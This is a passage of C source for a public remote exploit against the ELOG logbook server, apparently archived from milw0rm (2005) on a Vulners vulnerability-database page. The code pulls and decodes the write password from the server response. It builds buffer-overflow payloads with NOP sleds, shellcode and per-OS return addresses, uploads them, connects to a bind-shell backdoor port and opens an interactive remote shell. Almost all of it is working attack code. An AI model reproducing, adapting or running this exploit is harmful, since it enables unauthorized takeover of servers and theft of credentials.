perror("setsockopt");
close(soc);
exit(1);
}
memset(&(rem_addr.sin_zero),'\0',8);
rem_addr.sin_family = AF_INET;
rem_addr.sin_port = htons(port);
rem_addr.sin_addr.s_addr = get_host_ip(hostname);
PRINTINFO(GETINGPASS,1);
if(connect(soc,(const struct sockaddr*)&rem_addr,sizeof(rem_addr))) {
fprintf(stderr,"[-] Can not Connect to server!\n");
exit(1);
}
if( (send(soc,request,strlen(request),0)) < 0 ){
perror("send");
exit(-1);
close(soc);
}
FD_CLR(soc,&read_fd);
FD_ZERO(&read_fd);
FD_SET(soc,&read_fd);
if( (ready = select(soc+1,&read_fd,(fd_set *)NULL,(fd_set *)NULL,&w_t)) < 0){
perror("select read socket");
close(soc);
exit(1);
}
if(FD_ISSET(soc,&read_fd)){
i = recv(soc, response, 30, 0);
if (i < 0) {
perror("Cannot receive response");
return ;
}
n = i;
while (i > 0) {
i = recv(soc, response + n, 30, MSG_DONTWAIT);
if (i > 0)
n += i;
if(i <= 0)
break;
}
response[strlen(response)] = '\0';
close(soc);
fflush(stdout);
if((z = strstr(response,"Write Password=")) != NULL)
while((*(char *)(z + 15)) != EOF && isgraph(*(char *)(z + 15))) {
if( *(char *)(z + 15) == 'W') {
if(! isascii(*(char *)(z+16)))
break;
}
*p = *(char *)(z + 15);
z++;
p++;
}
else {NPRINTINFO(PASSFAILED); exit(EXIT_FAILURE);}
base64_decode(wpassbuf,wpassbufdec);
strncpy(w,wpassbuf,sizeof(wpassbuf));
for(i = 0; isgraph(wpassbufdec[i]) ; i++)
{ }
wpassbufdec[i] = '\0';
PRINTINFO(PASSSUCCESS,1);
printf(""GREEN"[+]Write Password = "DEFAULT" "GREEN"%s"DEFAULT"\n",wpassbufdec);
}
}
void make_spy_header(char *hostname,short port, char *buf,char *logbook)
{
char *url_enc = urlencode(logbook);
bzero(buf,sizeof(buf));
strncpy(buf,GETREQ,sizeof(GETREQ));
sprintf(buf + strlen(buf), "%s/",url_enc);
sprintf(buf + strlen(buf), "%s",GETREQCMD);
strcat (buf, HTTPVER);
sprintf(buf + strlen(buf), "Host: %s:%d\r\n", hostname,port);
sprintf(buf + strlen(buf), "User-Agent: ELOG\r\n");
sprintf(buf + strlen(buf), "Accept-Language: en-us,en;q=0.5\r\n");
sprintf(buf + strlen(buf), "Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7\r\n");
sprintf(buf + strlen(buf), "Accept-Encoding: gzip,deflate\r\n");
sprintf(buf + strlen(buf), "Keep-Alive: 300\r\n");
sprintf(buf + strlen(buf), "Connection: keep-alive\r\n");
sprintf(buf + strlen(buf), "Authorization: Basic %s\r\n\r\n",encuserandpass);
}
void authorize_user(char *user , char *pass)
{
char *p;
char *k;
p = (char *)&userandpass[0];
k = (char *)&encuserandpass[0];
bzero(userandpass,sizeof(userandpass));
bzero(encuserandpass,sizeof(encuserandpass));
sprintf(p,"%s%c",user,':');
sprintf(p + strlen(p) ,"%s",pass);
base64_encode(userandpass,encuserandpass);
}
void build_att_buffer(int choice,int vendor)
{
unsigned int *i;
char *c;
if(choice == 0)
c = lnx_shellcode;
if(choice == 1)
c = bsd_shellcode;
if(choice == 2) {
bzero(windozetext,sizeof(windozetext));
c = win_shellcode;
memset(windozebuf,'Z',sizeof(windozebuf));
memset(windozetext,NOP,sizeof(windozetext));
i = (int *)&windozebuf[242];
*i = TARGETZ[vendor].ret;
strcpy(&windozetext[sizeof(windozetext) -strlen(c)],c);
return;
}
bzero(shbuffer,sizeof(shbuffer));
bzero(bigbuffer,sizeof(bigbuffer));
bzero(debianbuffer,sizeof(debianbuffer));
memset(bigbuffer,NOP,sizeof(bigbuffer));
memset(shbuffer,'A',sizeof(shbuffer));
memset(debianbuffer,'A',sizeof(debianbuffer));
memset(fedorabuf,'B',sizeof(fedorabuf));
strcpy(&bigbuffer[BIGBUFSIZE - strlen(c)],c);
if(vendor == 4) {
i = (int *)&fedorabuf[284];
}
if(vendor == 5 || vendor == 2 ){
i = (int *)&debianbuffer[260];
}
if((vendor != 4) && (vendor != 5) && (vendor != 6) && (vendor != 2)){
i = (int *)&shbuffer[284];
}
*i = TARGETZ[vendor].ret;
return;
}
void do_last_stage(char *hostname,short port,char *logbook)
{
int soc;
int yes = 0;
struct sockaddr_in rem_addr;
char angelform[SENDBUFSIZE];
char *content;
int flagz = UPLOADME;
bzero(angelform,sizeof(angelform));
content = make_http_content(flagz,logbook);
strcat(angelform,make_request_header(logbook,boundary,0));
strcat(angelform,content);
soc = socket(AF_INET,SOCK_STREAM,IPPROTO_TCP);
if(soc < 0)
{
perror("socket");
exit(1);
}
if(setsockopt(soc,SOL_SOCKET,SO_REUSEADDR,(char *)&yes,sizeof(int))) {
perror("setsockopt");
close(soc);
exit(1);
}
memset(&(rem_addr.sin_zero),'\0',8);
rem_addr.sin_family = AF_INET;
rem_addr.sin_port = htons(port);
rem_addr.sin_addr.s_addr = get_host_ip(hostname);
if(connect(soc,(const struct sockaddr*)&rem_addr,sizeof(rem_addr))) {
fprintf(stderr,"[-] Can not Connect to server!\n");
exit(1);
}
if( (send(soc,angelform,strlen(angelform),0)) < 0 ){
perror("send");
exit(-1);
close(soc);
}
close(soc);
return;
}
void we_r_coming(char* hostname)
{
int sock;
int yes;
short port;
struct sockaddr_in rem_addr;
port = BACKDOOR;
if(id == 6){
port = WINBACKDOOR;
}
if(id == 2 || id == 10 || id == 11){
port = BSDBACKDOOR;
}
sock = socket(AF_INET,SOCK_STREAM,IPPROTO_TCP);
if(sock < 0)
{
perror("socket");
exit(1);
}
if(setsockopt(sock,SOL_SOCKET,SO_REUSEADDR,(char *)&yes,sizeof(int))) {
perror("setsockopt");
close(sock);
exit(1);
}
memset(&(rem_addr.sin_zero),'\0',8);
rem_addr.sin_family = AF_INET;
rem_addr.sin_port = htons(port);
rem_addr.sin_addr.s_addr = get_host_ip(hostname);
sleep(4);
if(connect(sock,(const struct sockaddr*)&rem_addr,sizeof(rem_addr))) {
NPRINTINFO(REMCRASHED);
close(sock);
exit(1);
}
shell(sock);
exit(0);
}
void shell(int sock)
{
fd_set fd_read;
char buffer[1024],*cmd = (id == 6 ? WINCMD : COMMAND);
int size;
FD_ZERO(&fd_read);
FD_SET(sock, &fd_read);
FD_SET(0, &fd_read);
send(sock, cmd, strlen(cmd), 0);
while(1) {
FD_SET(sock,&fd_read);
FD_SET(0,&fd_read);
if (select(FD_SETSIZE, &fd_read, NULL, NULL, NULL) < 0 ) break;
if (FD_ISSET(sock, &fd_read)) {
if((size = recv(sock, buffer, sizeof(buffer), 0)) < 0){
NPRINTINFO(NODATA);
exit(1);
}
if (write(1, buffer, size) < 0) break;
}
if (FD_ISSET(0, &fd_read)) {
if((size = read(0, buffer, sizeof(buffer))) < 0){
NPRINTINFO(NODATA);
exit(1);
}
if (send(sock, buffer, size, 0) < 0) break;
}
usleep(30);
}
NPRINTINFO(REMDOWN);
exit(0);
}
void banner(void)
{
puts(""GREEN"n4rk0tix(4DDICT3DZ)"DEFAULT" *nix/Windows Elog E.L remote $hell exploit\n");
return;
}
void usage(char * arg)
{
fprintf(stderr,"Usage :%s -h hostname\n"
" \t\t\t -p port\n"
" \t\t\t -l logbookname\n"
" \t\t\t -o Operating System ID\n"
" \t\t\t -d List Operating system ID\n"
" \t\t\t -u logbook user for read(If required)\n"
" \t\t\t -r logbook password for read (If required)\n"
" \t\t\t -w logbook password for write(If required)\n",arg
);
return;
}
void listos(void)
{
int i;
for(i = 0; TARGETZ[i].id != -1 ; i++)
{
printf("%d = %s\n",i,TARGETZ[i].distro);
}
return;
}
/* Vert3k, hic bir zaman senin inandigina inanmadim, koda tapan ben deilim*/
// milw0rm.com [2005-02-09]Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
09 Feb 2005 00:00Current
7High risk
Vulners AI Score7